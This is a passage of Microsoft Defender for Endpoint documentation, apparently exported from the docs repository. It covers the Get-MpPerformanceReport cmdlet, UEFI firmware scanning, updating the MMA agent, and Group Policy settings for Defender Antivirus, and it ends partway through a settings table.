-```output
-Get-MpPerformanceReport [-Path] <String>
- [-TopScans [<Int32>]]
- [-TopPaths [<Int32>] [-TopPathsDepth [<Int32>]]]
- [-TopScansPerPath [<Int32>]]
- [-TopFilesPerPath [<Int32>]
- [-TopScansPerFilePerPath [<Int32>]]
- ]
- [-TopExtensionsPerPath [<Int32>]
- [-TopScansPerExtensionPerPath [<Int32>]]
- ]
- [-TopProcessesPerPath [<Int32>]
- [-TopScansPerProcessPerPath [<Int32>]]
- ]
- ]
- [-TopFiles [<Int32>]
- [-TopScansPerFile [<Int32>]]
- [-TopProcessesPerFile [<Int32>]
- [-TopScansPerProcessPerFile [<Int32>]]
- ]
- ]
- [-TopExtensions [<Int32>]
- [-TopScansPerExtension [<Int32>]
- [-TopPathsPerExtension [<Int32>] [-TopPathsDepth [<Int32>]]
- [-TopScansPerPathPerExtension [<Int32>]]
- ]
- [-TopProcessesPerExtension [<Int32>]
- [-TopScansPerProcessPerExtension [<Int32>]]
- ]
- [-TopFilesPerExtension [<Int32>]
- [-TopScansPerFilePerExtension [<Int32>]]
- ]
- ]
- [-TopProcesses [<Int32>]
- [-TopScansPerProcess [<Int32>]]
- [-TopExtensionsPerProcess [<Int32>]
- [-TopScansPerExtensionPerProcess [<Int32>]]
- ]
- [-TopPathsPerProcess [<Int32>] [-TopPathsDepth [<Int32>]]
- [-TopScansPerPathPerProcess [<Int32>]]
- ]
- [-TopFilesPerProcess [<Int32>]
- [-TopScansPerFilePerProcess [<Int32>]]
- ]
- ]
- [-MinDuration <String>]
- [-Raw]
-```
-
-#### Description: Get-MpPerformanceReport
-
-The `Get-MpPerformanceReport` cmdlet analyzes a previously collected Microsoft Defender Antivirus performance recording ([New-MpPerformanceRecording](#new-mpperformancerecording)) and reports the file paths, file extensions, and processes that cause the highest impact to Microsoft Defender Antivirus scans.
-
-The performance analyzer provides an insight into problematic files that could cause a degradation in the performance of Microsoft Defender Antivirus. This tool is provided "AS IS" and isn't intended to provide suggestions on exclusions. Exclusions can reduce the level of protection on your endpoints. Exclusions, if any, should be defined with caution.
-
-For more information on the performance analyzer, see [Performance Analyzer](/windows-hardware/test/wpt/windows-performance-analyzer) docs.
-
-**Supported OS versions**:
-
-Windows Version 10 and later.
-
-> [!NOTE]
-> This feature is available starting with platform version 4.18.2108.X and later.
-
-#### Examples: Get-MpPerformanceReport
-
-##### Example 1: Single query
-
-```powershell
-Get-MpPerformanceReport -Path .\Defender-scans.etl -TopScans 20
-```
-
-##### Example 2: Multiple queries
-
-```powershell
-Get-MpPerformanceReport -Path .\Defender-scans.etl -TopFiles 10 -TopExtensions 10 -TopProcesses 10 -TopScans 10
-```
-
-##### Example 3: Nested queries
-
-```powershell
-Get-MpPerformanceReport -Path .\Defender-scans.etl -TopProcesses 10 -TopExtensionsPerProcess 3 -TopScansPerExtensionPerProcess 3
-```
-
-##### Example 4: Using -MinDuration parameter
-
-```powershell
-Get-MpPerformanceReport -Path .\Defender-scans.etl -TopScans 100 -MinDuration 100ms
-```
-
-##### Example 5: Using -Raw parameter
-
-```powershell
-Get-MpPerformanceReport -Path .\Defender-scans.etl -TopFiles 10 -TopExtensions 10 -TopProcesses 10 -TopScans 10 -Raw | ConvertTo-Json
-```
-
-Using \-Raw in the above command specifies that the output should be machine readable and readily convertible to serialization formats like JSON.
-
-#### Parameters: Get-MpPerformanceReport
-
-##### -TopPaths
-
-Requests a top-paths report and specifies how many top paths to output, sorted by Duration. Aggregates the scans based on their path and directory. User can specify how many directories should be displayed on each level and the depth of the selection.
-
-```yaml
-- Type: Int32-- Position: Named-- Default value: None-- Accept pipeline input: False-- Accept wildcard characters: False
-```
-
-##### -TopPathsDepth
-
-Specifies recursive depth that is used to group and display aggregated path results. For example "C:\" corresponds to a depth of 1, "C:\Users\Foo" corresponds to a depth of 3.
-
-This flag can accompany all other Top Path options. If missing, a default value of 3 is assumed. Value can't be 0.
-
-```yaml
-- Type: Int32-- Position: Named-- Default value: 3-- Accept pipeline input: False-- Accept wildcard characters: False
-```
-
-| flag | definition |
-|:|:|
-| -**TopScansPerPath** | Specifies how many top scans to specify for each top path. |
-| -**TopFilesPerPath** | Specifies how many top files to specify for each top path. |
-| -**TopScansPerFilePerPath** | Specifies how many top scans to output for each top file for each top path, sorted by "Duration" |
-| -**TopExtensionsPerPath** | Specifies how many top extensions to output for each top path |
-| -**TopScansPerExtensionPerPath** | Specifies how many top scans to output for each top extension for each top path |
-| -**TopProcessesPerPath** | Specifies how many top processes to output for each top path |
-| -**TopScansPerProcessPerPath** | Specifies how many top scans to output for each top process for each top path |
-| -**TopPathsPerExtension** | Specifies how many top paths to output for each top extension |
-| -**TopScansPerPathPerExtension** | Specifies how many top scans to output for each top path for each top extension |
-| -**TopPathsPerProcess** | Specifies how many top paths to output for each top process |
-| -**TopScansPerPathPerProcess** | Specifies how many top scans to output for each top path for each top process |
-
-##### -MinDuration
-
-Specifies the minimum duration of any scan or total scan durations of files, extensions, and processes included in the report; accepts values like **0.1234567sec**, **0.1234ms**, **0.1us**, or a valid TimeSpan.
-
-```yaml
-Type: String
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -Path
-
-Specifies the path or paths to one or more locations.
-
-```yaml
-Type: String
-Position: 0
-Default value: None
-Accept pipeline input: True
-Accept wildcard characters: False
-```
-
-##### -Raw
-
-Specifies that output of performance recording should be machine readable and readily convertible to serialization formats like JSON (for example, via Convert-to-JSON command). This configuration is recommended for users interested in batch processing with other data processing systems.
-
-```yaml
-Type: <SwitchParameter>
-Position: Named
-Default value: False
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopExtensions
-
-Specifies how many top extensions to output, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopExtensionsPerProcess
-
-Specifies how many top extensions to output for each top process, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopFiles
-
-Requests a top-files report and specifies how many top files to output, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopFilesPerExtension
-
-Specifies how many top files to output for each top extension, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopFilesPerProcess
-
-Specifies how many top files to output for each top process, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopProcesses
-
-Requests a top-processes report and specifies how many of the top processes to output, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopProcessesPerExtension
-
-Specifies how many top processes to output for each top extension, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopProcessesPerFile
-
-Specifies how many top processes to output for each top file, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScans
-
-Requests a top-scans report and specifies how many top scans to output, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerExtension
-
-Specifies how many top scans to output for each top extension, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerExtensionPerProcess
-
-Specifies how many top scans to output for each top extension for each top process, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerFile
-
-Specifies how many top scans to output for each top file, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerFilePerExtension
-
-Specifies how many top scans to output for each top file for each top extension, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerFilePerProcess
-
-Specifies how many top scans for output for each top file for each top process, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerProcess
-
-Specifies how many top scans to output for each top process in the Top Processes report, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerProcessPerExtension
-
-Specifies how many top scans for output for each top process for each top extension, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-##### -TopScansPerProcessPerFile
-
-Specifies how many top scans for output for each top process for each top file, sorted by Duration.
-
-```yaml
-Type: Int32
-Position: Named
-Default value: None
-Accept pipeline input: False
-Accept wildcard characters: False
-```
-
-## Additional resources
-
-If you're looking for Antivirus-related information for other platforms, see:
--- [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)-- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)-- [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)-- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Configure Defender for Endpoint on Android features](android-configure.md)- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Uefi Scanning In Defender For Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/uefi-scanning-in-defender-for-endpoint.md
- Title: UEFI scanning in Defender for Endpoint
-description: Learn how Microsoft Defender for Endpoint is extending its protection capabilities to the firmware level with a new Unified Extensible Firmware Interface (UEFI) scanner.
--------
- - admindeeplinkDEFENDER
--- m365-security-- tier2 Previously updated : 04/16/2024--
-# UEFI scanning in Defender for Endpoint
-
-Recently, Microsoft Defender for Endpoint extended its protection capabilities to the firmware level with a new [Unified Extensible Firmware Interface (UEFI)](/windows-hardware/drivers/bringup/unified-extensible-firmware-interface) scanner.
-
-Hardware and firmware-level attacks have continued to rise in recent years, as modern security solutions made persistence and detection evasion on the operating system more difficult. Attackers compromise the boot flow to achieve low-level malware behavior that's hard to detect, posing a significant risk to an organization's security posture.
-
-[Windows Defender System Guard](/windows/security/hardware-security/how-hardware-based-root-of-trust-helps-protect-windows) helps defend against firmware attacks by providing guarantees for secure boot through hardware-backed security features like [hypervisor-level attestation](https://www.microsoft.com/security/blog/2018/04/19/introducing-windows-defender-system-guard-runtime-attestation/) and [Secure Launch](/windows/security/threat-protection/windows-defender-system-guard/system-guard-how-hardware-based-root-of-trust-helps-protect-windows), also known as Dynamic Root of Trust (DRTM), which are enabled by default in [Secured-core PCs](https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers). The new UEFI scan engine in Defender for Endpoint expands on these protections by making firmware scanning broadly available.
-
-The UEFI scanner is a new component of the [built-in antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-in-windows-10) solution on Windows 10 and newer versions, and gives Defender for Endpoint the unique ability to scan inside of the firmware filesystem and perform security assessment. It integrates insights from our partner chipset manufacturers and further expands the comprehensive endpoint protection provided by Defender for Endpoint.
-
-## Prerequisites
--- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md) as the primary antivirus product and in active mode. UEFI scanner doesn't work with [EDR in block mode](edr-in-block-mode.md) (with Microsoft Defender Antivirus in passive mode).-- [Real-time protection](configure-protection-features-microsoft-defender-antivirus.md) is turned on-- [Behavior monitoring](behavior-monitor.md) is turned on-- Devices are running a current [Microsoft Defender Antivirus platform version](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions)-- Devices are running one of the following versions of Windows:
- - Windows 10, Windows 11 or newer on client devices
- - Windows Server 2019, Windows Server 2022, or newer versions
- - [Windows Server 2012 R2 and Windows Server 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292) with the [unified Defender for Endpoint client](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution) installed
-
-## What is the UEFI scanner?
-
-The Unified Extensible Firmware Interface (UEFI) is a replacement for [legacy BIOS](/windows-hardware/drivers/bringup/smbios). If the chipset is configured correctly ([UEFI](https://uefi.org/sites/default/files/resources/UEFI%20Spec%202_6.pdf) & chipset configuration itself) and [secure boot](/windows-hardware/design/device-experiences/oem-secure-boot) is enabled, the firmware is reasonably secure. To perform a hardware-based attack, attackers exploit a vulnerable firmware or a misconfigured machine to deploy a [rootkit](https://www.microsoft.com/en-us/microsoft-365-life-hacks/privacy-and-safety/what-is-a-rootkit), which allows attackers to gain foothold on the machine.
--
-As the figure shows, for devices that are [configured correctly](/windows-hardware/drivers/bringup/secure-boot-and-device-encryption-overview), the boot path from power-on to OS initialization is reliable. If secure boot is disabled or if the motherboard chipset is misconfigured, attackers can change the contents of UEFI drivers that are unsigned or tampered with in the firmware. This could allow attackers to take over control of devices and give them the capability to deprivilege the operating system kernel or antivirus to reconfigure the security of the firmware.
--
-The [Serial Peripheral Interface (SPI)](https://en.wikipedia.org/wiki/Serial_Peripheral_Interface) flash stores important information. Its structure depends on OEM's design, and commonly includes processor microcode update, Intel Management Engine (ME), and boot image, a UEFI executable. When a computer runs, processors execute the firmware code from SPI flash for a while during UEFI's SEC phase. Instead of memory, the flash is permanently mapped to x86 reset vector (physical address 0xFFFF_FFF0). However, attackers can interfere with memory access to reset vector by software. They do this by reprogramming the BIOS control register on misconfigured devices, making it even harder for security software to determine exactly what gets executed during boot.
-
-Once an implant is deployed, it's hard to detect. To catch threats at this level, security solutions at the OS level rely on information from the firmware, but the chain of trust is weakened.
-
-Technically, the firmware isn't stored and isn't accessible from main memory. As opposed to other software, it's stored in SPI flash storage, so the new UEFI scanner must follow the hardware protocol provided by hardware manufacturers. To be compatible and be up to date with all platforms, it needs to take into consideration protocol differences.
--
-The UEFI scanner performs dynamic analysis on the firmware it gets from the hardware flash storage. By obtaining the firmware, the scanner is able to parse the firmware, enabling Defender for Endpoint to inspect firmware content at runtime.
-
-## How do you turn on the UEFI scanner?
-
-The new UEFI scanner is a component of Microsoft Defender Antivirus, thus, as long as it's the primary AV, it includes this capability to scan and access UEFI firmware.
-
-## How do you manage the UEFI scanner?
-
-It's a built-in functionality of Microsoft Defender Antivirus. Thus, there is no additional management.
-
-## How does the UEFI scanner in Defender for Endpoint work?
-
-The new UEFI scanner reads the firmware file system at runtime by interacting with the motherboard chipset. To detect threats, it performs dynamic analysis using multiple new solution components that include:
--- UEFI anti-rootkit, which reaches the firmware through Serial Peripheral Interface (SPI)-- Full filesystem scanner, which analyzes content inside the firmware-- Detection engine, which identifies exploits and malicious behaviors-
-Firmware scanning is orchestrated by runtime events like suspicious driver load and through periodic system scans. Detections are reported in Windows Security, under Protection history.
--
-Defender for Endpoint customers can see these detections raised as alerts in the [Microsoft Defender portal](https://security.microsoft.com/), empowering security operations teams to investigate and respond to firmware attacks and suspicious activities at the firmware level in their environments.
--
-To detect unknown threats in SPI flash, signals from the UEFI scanner are analyzed to identify anomalies and where they have been executed. Anomalies are reported to the Microsoft Defender portal for investigation.
--
-These events can likewise be queried through advanced hunting as shown:
-
-```kusto
-DeviceAlertEvents
-
-| where Title has "UEFI"
-
-| summarize Titles=makeset(Title) by DeviceName, DeviceId, bin(Timestamp, 1d)
-
-| limit 100
-```
-
-## Comprehensive security levels up with low-level protections
-
-The new UEFI scanner adds to a rich set of Microsoft technologies that integrate to deliver chip-to-cloud security, from a strong hardware root of trust to cloud-powered security solutions at the OS level.
-
-Hardware backed security features like Secure Launch and device attestation help stop firmware attacks. These features, which are enabled by default in [Secured-core PCs](https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers), seamlessly integrate with Defender for Endpoint to provide comprehensive endpoint protection.
-
-With its UEFI scanner, [Defender for Endpoint](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp) gets even richer visibility into threats at the firmware level, where attackers have been increasingly focusing their efforts on. Security operations teams can use this new level of visibility, along with the rich set of detection and response capabilities in Defender for Endpoint, to investigate and contain such advanced attacks.
-
-This level of visibility is also available in the [Microsoft Defender portal](https://www.microsoft.com/security/technology/threat-protection), which delivers an even broader cross-domain defense that coordinates protection across endpoints, identities, email, and apps.
security Update Agent Mma Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/update-agent-mma-windows.md
- Title: Update your agent on devices for Microsoft Defender for Endpoint
-description: Learn about your options for updating or replacing your MMA agent on Windows devices for Defender for Endpoint.
---- Previously updated : 10/05/2023---- m365-security-- tier2----
-# Updating MMA on Windows devices for Microsoft Defender for Endpoint
-
-> [!IMPORTANT]
-> If you've arrived on this page as a result of clicking on a notification at the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), you have devices in your environment with outdated agents, and you need to take action (described in this article) to avoid service disruption. For more details, please reference message center post MC598631 (requires access to [Message Center](/microsoft-365/admin/manage/message-center)).
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-If you're using the Microsoft Monitoring Agent (MMA) on Windows devices, it's important to keep this agent updated. For Windows Server 2012 R2 and Windows Server 2016, Microsoft recommends upgrading to the new, unified agent for Defender for Endpoint. This article describes how to:
--- **[Update the MMA on your devices](#update-mma-on-your-devices)** (for devices running Windows 7 SP1 Enterprise, Windows 7 SP1 Pro, Windows 8.1 Pro, Windows 8.1 Enterprise, and Windows Server 2008 R2 SP1).-- **[Upgrade to the new, unified agent for Defender for Endpoint](#upgrade-to-the-new-unified-agent-for-defender-for-endpoint)** (for devices running Windows Server 2012 R2 and Windows Server 2016).-
-## Update MMA on your devices
-
-*This option applies to devices running Windows 7 SP1 Enterprise, Windows 7 SP1 Pro, Windows 8.1 Pro, Windows 8.1 Enterprise, and Windows Server 2008 R2 SP1.*
--- To help you identify older versions of the MMA inside of your organization, you can use the "EOSDate" column in advanced hunting. Or, follow the instructions in [Plan for end-of-support software and software versions](/microsoft-365/security/defender-vulnerability-management/tvm-end-of-support-software) to use the vulnerability management feature inside of Microsoft Defender for Endpoint to track remediation.--- See [Manage and maintain the Log Analytics agent for Windows and Linux](/azure/azure-monitor/agents/agent-manage?tabs=PowerShellLinux) for instructions on how to upgrade the agent using Azure Automation or a command-line approach to use with various deployment tools and methods. --- Update MMA by using [Microsoft Update](/windows/deployment/update/how-windows-update-works), through [Windows Server Update Services](/windows/deployment/update/waas-manage-updates-wsus) or [Configuration Manager](/mem/configmgr/osd/deploy-use/manage-windows-as-a-service). Use the method that was configured when MMA was first installed on the device.--- Download the MMA setup file:-
- - **Windows 64-bit agent**: [https://go.microsoft.com/fwlink/?LinkId=828603](https://go.microsoft.com/fwlink/?LinkId=828603)
- - **Windows 32-bit agent**: [https://go.microsoft.com/fwlink/?LinkId=828604](https://go.microsoft.com/fwlink/?LinkId=828604)
-
-## Upgrade to the new, unified agent for Defender for Endpoint
-
-*This option applies to servers running Windows Server 2012 R2 and Windows Server 2016.*
-
-A new agent was released in April 2022 for Windows Server 2012 R2 and Windows Server 2016. The new agent doesn't depend on MMA. There are significant benefits to moving to this new agent, such as a vastly extended feature set. To learn more, see [Tech Community Blog: Defending Windows Server 2012 R2 and 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292).
--- Microsoft Defender Vulnerability Management provides an assessment (SCID-2030) titled "Update Microsoft Defender for Endpoint core components" that allows you to track which Windows Server 2012 R2 or Windows Server 2016 machines haven't been upgraded yet.--- See [Server migration scenarios from the previous, MMA-based Microsoft Defender for Endpoint solution](server-migration.md) to understand your options for upgrading to the new agent.--- If you're using Microsoft Endpoint Configuration Manager (SCCM/ConfigMgr) 2107 or later to manage your servers running Windows Server 2012 R2 or Windows Server 2016, see [Migrating servers from Microsoft Monitoring Agent to the unified solution](application-deployment-via-mecm.md) to perform an **orchestrated** upgrade.--- If you're using Microsoft Endpoint Configuration Manager (SCCM/ConfigMgr) 2207 or later to manage your servers running Windows Server 2012 R2 or Windows Server 2016, see [Onboarding to Microsoft Defender for Endpoint with Configuration Manager 2207 and later versions](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection) to perform an **automated** upgrade.--- If you're using Microsoft Defender for Cloud with servers running Windows Server 2012 R2 or Windows Server 2016, you can automate the upgrade by selecting **Enable unified solution**. See [Users with Defender for Servers enabled and Microsoft Defender for Endpoint deployed](/azure/defender-for-cloud/integration-defender-for-endpoint?tabs=windows).-
-## Important information about MMA
--- If you've determined that you aren't using the MMA for Defender for Endpoint, or you've already updated your agent, no other steps are needed. --- If you are, however, still using MMA for other purposes (such as Log Analytics), MMA is currently set to retire in August 2024. See [We're retiring the Log Analytics agent in Azure Monitor on 31 August 2024](https://azure.microsoft.com/updates/were-retiring-the-log-analytics-agent-in-azure-monitor-on-31-august-2024/). Depending on your particular scenario, now might be a good time to upgrade to [Azure Monitoring Agent, the successor of MMA](/azure/azure-monitor/agents/azure-monitor-agent-migration). -
-> [!IMPORTANT]
-> Devices running Windows 7 SP1, Windows 8.1, or Windows Server 2008 R2 remain dependent on MMA.
->
-> Devices running Windows Server 2012 R2 or Windows Server 2016 should be upgraded to the [new, unified solution](application-deployment-via-mecm.md) so that they no longer require the use of MMA.
->
-> [AMA](/azure/azure-monitor/agents/agents-overview) cannot be used as a substitute for Defender for Endpoint.
-
-## See also
--- [Make the switch from non-Microsoft endpoint protection to Microsoft Defender for Endpoint](switch-to-mde-overview.md)-- [Microsoft Defender for Endpoint deployment overview](deployment-phases.md)-- [Onboard to the Microsoft Defender for Endpoint service](onboarding.md)-
security Use Group Policy Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/use-group-policy-microsoft-defender-antivirus.md
- Title: Configure Microsoft Defender Antivirus with Group Policy
-description: Learn how to use a Group Policy to configure and manage Microsoft Defender Antivirus on your endpoints in Microsoft Defender for Endpoint.
---- Previously updated : 04/03/2024------- m365-security-- tier2-- mde-ngp--
-# Use Group Policy settings to configure and manage Microsoft Defender Antivirus
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-We recommend using [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) to manage Microsoft Defender Antivirus settings for your organization. However, you can use [Group Policy](/windows/win32/srvnodes/group-policy) to configure and manage some settings for Microsoft Defender Antivirus.
-
-> [!IMPORTANT]
-> If [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) is enabled in your organization, any changes made to [tamper-protected settings](/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#what-happens-when-tamper-protection-is-turned-on) are ignored. In addition, you cannot turn off tamper protection by using Group Policy.
->
-> If you must make changes to a device and those changes are blocked by tamper protection, we recommend using [troubleshooting mode](/microsoft-365/security/defender-endpoint/enable-troubleshooting-mode) to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.
->
-
-## Configure Microsoft Defender Antivirus using Group Policy
-
-In general, you can use the following procedure to configure or change some settings for Microsoft Defender Antivirus.
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object (GPO) you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus**.
-
-5. Expand the section (referred to as **Location** in the table in this article) that contains the setting you want to configure, double-click the setting to open it, and make configuration changes.
-
-6. [Deploy the updated GPO as you normally do](/windows/win32/srvnodes/group-policy).
-
-## Group Policy settings and resources
-
-The following table lists commonly used Group Policy settings that are available in Windows 10.
-
-> [!TIP]
-> For the most current settings, see get the latest ADMX files in your central store to access the correct policy options. See [How to create and manage the Central Store for Group Policy Administrative Templates in Windows](/troubleshoot/windows-client/group-policy/create-and-manage-central-store) and download the latest files.
--
-|Location|Setting|Article|
-||||
-|Client interface|Enable headless UI mode|[Prevent users from seeing or interacting with the Microsoft Defender Antivirus user interface](prevent-end-user-interaction-microsoft-defender-antivirus.md)|
-|Client interface|Display more text to clients when they need to perform an action|[Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)|
-|Client interface|Suppress all notifications|[Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)|
-|Client interface|Suppresses reboot notifications|[Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md)|
-|Exclusions|Extension Exclusions|[Configure and validate exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)|
-|Exclusions|Path Exclusions|[Configure and validate exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)|
-|Exclusions|Process Exclusions|[Configure and validate exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)|
-|Exclusions|Turn off Auto Exclusions|[Configure and validate exclusions in Microsoft Defender Antivirus scans](configure-exclusions-microsoft-defender-antivirus.md)|
-|MAPS|Configure the "Block at First Sight" feature|[Enable block at first sight](configure-block-at-first-sight-microsoft-defender-antivirus.md)|
-|MAPS|Join Microsoft MAPS|[Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md)|
-|MAPS|Send file samples when further analysis is required|[Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md)|
-|MAPS|Configure local setting override for reporting to Microsoft MAPS|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|MpEngine|Configure extended cloud check|[Configure the cloud block timeout period](configure-cloud-block-timeout-period-microsoft-defender-antivirus.md)|
-|MpEngine|Select cloud protection level|[Specify the cloud-delivered protection level](specify-cloud-protection-level-microsoft-defender-antivirus.md)|
-|Network inspection system|Specify more definition sets for network traffic inspection| Not used (deprecated) |
-|Network inspection system|Turn on definition retirement| Not used (deprecated)|
-|Network inspection system|Turn on protocol recognition| Not used (deprecated)|
-|Quarantine|Configure local setting override for the removal of items from Quarantine folder|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Quarantine|Configure removal of items from Quarantine folder|[Configure remediation for Microsoft Defender Antivirus scans](configure-remediation-microsoft-defender-antivirus.md)|
-|Real-time protection|Configure local setting override for monitoring file and program activity on your computer|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Real-time protection|Configure local setting override for monitoring for incoming and outgoing file activity|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Real-time protection|Configure local setting override for scanning all downloaded files and attachments|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Real-time protection|Configure local setting override to turn on behavior monitoring|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Real-time protection|Configure local setting override to turn on real-time protection|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
-|Real-time protection|Define the maximum size of downloaded files and attachments to be scanned|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Monitor file and program activity on your computer|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Scan all downloaded files and attachments|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Turn off real-time protection|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Turn on behavior monitoring|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Turn on process scanning whenever real-time protection is enabled|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Turn on raw volume write notifications|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Real-time protection|Configure monitoring for incoming and outgoing file and program activity|[Enable and configure Microsoft Defender Antivirus always-on protection and monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)|
-|Remediation|Configure local setting override for the time of day to run a scheduled full scan to complete remediation|[Prevent or allow users to locally modify policy settings](configure-local-policy-overrides-microsoft-defender-antivirus.md)|
